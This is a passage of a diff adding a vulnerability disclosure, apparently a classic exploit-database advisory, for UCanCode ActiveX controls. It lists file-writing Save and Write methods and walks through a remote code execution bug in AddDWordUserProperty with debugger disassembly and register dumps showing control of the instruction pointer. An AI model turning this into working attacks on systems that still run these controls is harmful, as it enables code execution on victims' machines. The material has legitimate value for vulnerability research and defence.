+Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
+Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
+Sub SaveToXdgFile (ByVal lpszFileName As String)
+----------------------------------------
+Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
+Class: UCCViewer {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
+Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
+----------------------------------------
+Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
+Class: UCCViewer {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
+Sub SaveToXdgFile (ByVal lpszFileName As String)
+----------------------------------------
+Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
+Class: UCCViewer {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
+Function SaveTemplateToFile (ByVal strFile As String) As Boolean
+----------------------------------------
+
+3) various Write methods:
+
+----------------------------------------
+Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX
+Class: UCCSIMPLE {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
+Function Write (ByVal lpszFileName As String) As Boolean
+----------------------------------------
+Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx
+Class: UCCHMI {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
+Function Write (ByVal lpszFileName As String) As Boolean
+----------------------------------------
+Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
+Class: UCCUML {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
+Function Write (ByVal lpszFileName As String) As Boolean
+----------------------------------------
+Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
+Class: UCCDiagram {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
+Function Write (ByVal lpszFileName As String) As Boolean
+----------------------------------------
+Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
+Class: UCCPrint {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
+Function Write (ByVal lpszFileName As String) As Boolean
+----------------------------------------
+Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
+Class: TKDrawCAD {9022B790-B810-45B4-80BC-2D94EEC5343C}
+Function Write (ByVal lpszFileName As String) As Boolean
+----------------------------------------
+Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
+Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
+Function Write (ByVal lpszFileName As String) As Boolean
+----------------------------------------
+Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
+Class: UCCViewer {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
+Function Write (ByVal lpszFileName As String) As Boolean
+----------------------------------------
+
+PROOF OF CONCEPT:
+
+
+
+
+
+----------------------------------------
+----------------------------------------
+
+REMOTE CODE EXECUTION
+
+This product is so poor coded that remote code execution is possible using a lot of functions (and I'm lazy),
+so here it is the description of just one of it, "AddDWordUserProperty":
+
+CPU Disasm
+Address Hex dump Command Comments
+...
+...
+1007FEB5 |. 8D5424 44 LEA EDX,[LOCAL.36]
+1007FEB9 |. 51 PUSH ECX
+1007FEBA |. 8B06 MOV EAX,DWORD PTR DS:[ESI] <- WE CAN CONTROL ESI
+1007FEBC |. 52 PUSH EDX
+1007FEBD |. 8BCE MOV ECX,ESI
+1007FEBF |. C78424 DC0000 MOV DWORD PTR SS:[LOCAL.0],0
+1007FECA |. 897C24 10 MOV DWORD PTR SS:[LOCAL.51],EDI
+1007FECE |. FF90 04030000 CALL DWORD PTR DS:[EAX+304]
+1007FED4 |. 85C0 TEST EAX,EAX
+...
+...
+Registers:
+CPU - thread 9. (00000B38), module UCCVIE~1_OCX
+EAX 015DD1D0
+ECX 015DD194
+EDX 015DD1D0
+EBX 00000000
+ESP 015DD188
+EBP 015DD300
+ESI 41414141 <- FIRST ARGUMENT PASSED TO AddDWordUserProperty METHOD
+EDI 42424242 <- SECOND ARGUMENT PASSED TO AddDWordUserProperty METHOD
+EIP 1007FEBA UCCVIE~1_OCX.1007FEBA
+
+----------------------------------------------------------------------
+
+We can use it to pass a valid memory address so that we can find a more comfortable situation :)
+CPU Disasm
+Address Hex dump Command Comments
+...
+...
+1007FEB5 |. 8D5424 44 LEA EDX,[LOCAL.36]
+1007FEB9 |. 51 PUSH ECX
+1007FEBA |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
+1007FEBC |. 52 PUSH EDX
+1007FEBD |. 8BCE MOV ECX,ESI
+1007FEBF |. C78424 DC0000 MOV DWORD PTR SS:[LOCAL.0],0
+1007FECA |. 897C24 10 MOV DWORD PTR SS:[LOCAL.51],EDI
+1007FECE |. FF90 04030000 CALL DWORD PTR DS:[EAX+304] <- WE NOW ARE IN CONTROL OF EAX
+1007FED4 |. 85C0 TEST EAX,EAX
+...
+...
+
+Registers
+CPU - thread 9. (00000B38), module UCCVIE~1_OCX
+EAX 45454545 <- THIS VALUE THAT WAS PREVIOUSLY STORED IN MEMORY, IF WE CHANGE IT IN ANOTHER VALID ADDRESS...
+ECX 00030040 ASCII "EEEE"
+EDX 015DD1D0
+EBX 00000000
+ESP 015DD184
+EBP 015DD300
+ESI 00030040 ASCII "EEEE"
+EDI 42424242
+EIP 1007FECE UCCVIE~1_OCX.1007FECE
+And...
+CPU - thread 9. (00000B38)
+EAX 0002FDBC
+ECX 00030040 ASCII "EEEE"
+EDX 015DD1D0
+EBX 00000000
+ESP 015DD180
+EBP 015DD300
+ESI 00030040 ASCII "EEEE"
+EDI 42424242
+EIP 46464646 <- BINGO :)
+
+----------------------------------------
+----------------------------------------
+
+BONUS STAGE:
+There are a huge number of DoS... happy hunting :)
+Peace, your friendly neighborhood shinnai.
+---------------------------------------------------------------------
\ No newline at end of file